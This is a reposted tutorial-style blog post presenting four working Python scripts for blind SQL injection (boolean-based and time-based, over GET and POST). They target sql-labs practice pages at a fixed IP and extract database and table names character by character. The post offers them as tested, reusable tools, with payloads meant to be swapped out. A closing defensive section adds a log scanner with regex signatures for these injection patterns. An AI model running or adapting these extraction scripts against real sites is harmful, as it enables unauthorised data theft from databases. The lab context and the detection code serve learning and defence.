SQL blind injection: GET/POST, boolean-based and time-based Python scripts
生活随笔
This article, collected and organized by 生活随笔, presents Python scripts for SQL blind injection over GET and POST parameters, both boolean-based and time-based. The editor found it quite useful and is sharing it here for reference.
All of the scripts below were tested against the sql-labs exercises:
sql-labs target range: http://43.247.91.228:84/
1. SQL injection, GET parameter, boolean-based:
```python
import requests

result = ""
# placeholders: {0} = injected subquery, {1} = character position, {2} = ASCII code
# equality test, as in the POST boolean script; a > test would stop at the first
# character in chars that is smaller than the real one
url_template = "http://43.247.91.228:84/Less-8/?id=2' and ascii(substr(({0}),{1},1))={2} %23"
chars = "0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz_,-.@&%/^!~"
url_length = "http://43.247.91.228:84/Less-8/?id=2' and length(({0}))={1} %23"


def get_result_length(payload, value):
    # length of the query result: the first n for which the "true" page comes back
    for n in range(1, 100):
        url = url_length.format(payload, n)
        response = requests.get(url)
        length = len(response.text)
        if length > value:
            print("……data length is :" + str(n))
            return n


def get_db_name(data_length, payload, value):
    global result
    for i in range(1, data_length):
        for char in chars:
            url = url_template.format(payload, i, ord(char))
            response = requests.get(url)
            length = len(response.text)
            if length > value:  # the difference in response length tells whether the character is right
                result += char
                print("…… data is :" + result)
                break


# custom SQL statement to inject; it fills placeholder {0}
payload = "select group_concat(table_name) from information_schema.tables where table_schema=database() "
# threshold chosen from the difference in page length between a true and a false response
value = 706
data_length = get_result_length(payload, value) + 1
get_db_name(data_length, payload, value)
print(result)
```

2. SQL injection, GET parameter, time-based:
```python
import requests

value = "0123456789abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ%&^@_.-!"
data = ""
# to fetch the next row, adjust the first argument of LIMIT in url and url_length by hand
# (0 selects the first row, which is the only row a query like select database() returns)
url = "http://43.247.91.228:84/Less-9/?id=1' and if((ascii(substr(({0} limit 0,1),{1},1)) = '{2}'),sleep(3),NULL); %23"
url_length = "http://43.247.91.228:84/Less-9/?id=1' and if((length(({0} limit 0,1))={1} ),sleep(3),NULL); %23"


def get_response(url):
    # a true condition makes the server sleep(3), which exceeds the 2-second client timeout
    try:
        requests.get(url, timeout=2)
        return False
    except Exception:
        print("......")
        return True


def get_length(payload):
    for n in range(1, 100):
        url = url_length.format(payload, n)
        # print(url)
        if get_response(url):
            print("[+] length is {0}".format(n))
            return n


def get_data(payload, value, length):
    global data
    for n in range(1, length):
        for v in value:
            url_data = url.format(payload, n, ord(v))  # ord() returns the character's ASCII code
            # print(url_data)
            if get_response(url_data):
                data = data + v
                print("[+] data is {0}".format(data))
                break


# change the payload to fetch the data you need
database_payload = "select database()"
get_data(database_payload, value, get_length(database_payload) + 1)
```

3. SQL injection, POST parameter, time-based:
```python
import requests
import time

value = "0123456789abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ%&^@_.-!"
result = ""
url = "http://43.247.91.228:84/Less-15/"
data_payload = "select group_concat(table_name,0x7e) from information_schema.tables where table_schema=database()"


def get_length():  # get the length of the data
    for n in range(1, 100):
        payload = "admin' and if((length(({0}))={1}),sleep(4),1) #".format(data_payload, n)
        data = {"uname": payload, "passwd": "admin", "submit": "submit"}
        start_time = time.time()
        requests.post(url, data=data)
        end_time = time.time()
        use_time = end_time - start_time  # the time spent on the request tells whether the sleep fired
        if use_time > 3:
            print("...... data's length is :" + str(n))
            return n


def get_data(length):  # get the data
    global result
    for n in range(1, length):
        for v in value:
            payload = "admin' and if((ascii(substr(({0}),{1},1)) = '{2}'),sleep(5),1) #".format(data_payload, n, ord(v))
            data = {"uname": payload, "passwd": "admin", "submit": "submit"}
            start_time = time.time()
            requests.post(url, data=data)
            end_time = time.time()
            use_time = end_time - start_time
            # Why such a long sleep? My network is often jittery and a plain request can take
            # over 2 seconds; a longer sleep avoids garbled results and keeps the data accurate
            if use_time > 4:
                result += v
                print("......" + result)
                break  # only one character matches at each position


length = get_length() + 1  # note the +1: range(1,10) covers 1 <= x < 10
get_data(length)
print(".....data is :" + result)
```

4. SQL injection, POST parameter, boolean-based:
```python
import requests

chars = "0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz_,-.@&%/^!~"
result = ""
url = "http://43.247.91.228:84/Less-15/"
data_payload = "select group_concat(table_name) from information_schema.tables where table_schema = database()"
# threshold chosen from the difference in page length between a true and a false response;
# read the lengths in the browser with F12
value = 1460


def get_length(value):  # length of the data being queried
    for n in range(1, 100):
        payload = "admin' and length(({0})) ={1} #".format(data_payload, n)
        data = {"uname": payload, "passwd": "admin"}
        html = requests.post(url, data=data)
        length = len(html.text)
        if length > value:
            print("……data length is :" + str(n))
            return n


def get_data(data_length, value):  # get the data
    global result
    for i in range(1, data_length):
        for char in chars:
            payload = "admin' and ascii(substr(({0}),{1},1))={2} #".format(data_payload, i, ord(char))
            data = {"uname": payload, "passwd": "admin"}
            html = requests.post(url, data=data)
            length = len(html.text)
            if length > value:  # the difference in response length tells whether the character is right
                result += char
                print("…… data is :" + result)
                break


length = get_length(value) + 1
get_data(length, value)
print(result)
```
(The scripts above have been tested and work without any problems.)
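From the defender's side, the same two techniques leave a recognisable trace in web server logs. The following is an added example, not code from the original post: it runs a small detector over constructed access-log lines shaped like the requests the GET scripts above send, URL-decodes each path, matches the boolean-blind and time-blind signatures, and counts hits per client address, since a blind extraction needs one request per character and so appears as a long run of near-identical requests from one source. The log lines, addresses and the threshold are constructed assumptions.

```python
import re
from collections import Counter
from urllib.parse import unquote_plus

# Constructed sample access-log lines (not from the page); they mimic the request shapes
# the GET scripts above generate, as a web server would record them after URL encoding.
SAMPLE_LOG = """\
10.0.0.5 - - [01/Jan/2024:10:00:01 +0000] "GET /Less-8/?id=2 HTTP/1.1" 200 706
10.0.0.9 - - [01/Jan/2024:10:00:02 +0000] "GET /Less-8/?id=2'%20and%20length((select%20database()))%20%3E5%20%23 HTTP/1.1" 200 720
10.0.0.9 - - [01/Jan/2024:10:00:03 +0000] "GET /Less-8/?id=2'%20and%20ascii(substr((select%20database()),1,1))=115%20%23 HTTP/1.1" 200 720
10.0.0.9 - - [01/Jan/2024:10:00:07 +0000] "GET /Less-9/?id=1'%20and%20if((length((select%20database()))=8),sleep(3),NULL)%20%23 HTTP/1.1" 200 706
10.0.0.7 - - [01/Jan/2024:10:00:08 +0000] "GET /Less-8/?id=3 HTTP/1.1" 200 720
"""

LOG_RE = re.compile(r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] "(?P<method>\S+) (?P<path>\S+) [^"]*" (?P<status>\d+) (?P<bytes>\d+)')

# Signatures for the two blind styles used above: boolean-blind compares ascii/length/substr
# of a subquery inside an and/or clause; time-blind puts a delay inside the condition.
SIGNATURES = {
    "boolean-blind": re.compile(r"\b(?:and|or)\b.*\b(?:ascii|length|substr)\s*\(", re.I),
    "time-blind": re.compile(r"\b(?:sleep|benchmark)\s*\(", re.I),
}


def classify_request(path):
    """Return the signature names that match the URL-decoded request path."""
    decoded = unquote_plus(path)
    return [name for name, rx in SIGNATURES.items() if rx.search(decoded)]


def scan_log(text):
    """Parse log lines; return (list of (ip, path, kinds) hits, per-IP hit counter)."""
    hits, per_ip = [], Counter()
    for line in text.splitlines():
        m = LOG_RE.match(line)
        if m and (kinds := classify_request(m["path"])):
            hits.append((m["ip"], m["path"], kinds))
            per_ip[m["ip"]] += 1
    return hits, per_ip


def suspicious_sources(per_ip, threshold=3):
    """IPs with at least `threshold` hits (constructed threshold): one request per character
    means an extraction shows up as a run of near-identical requests from one source."""
    return sorted(ip for ip, n in per_ip.items() if n >= threshold)


if __name__ == "__main__":
    hits, per_ip = scan_log(SAMPLE_LOG)
    for ip, path, kinds in hits:
        print(ip, kinds, unquote_plus(path))
    print("sources to investigate:", suspicious_sources(per_ip))
```

The signatures are deliberately narrow; in practice they sit beside a rate check like `suspicious_sources`, because a boolean-blind probe on its own looks like a single odd request.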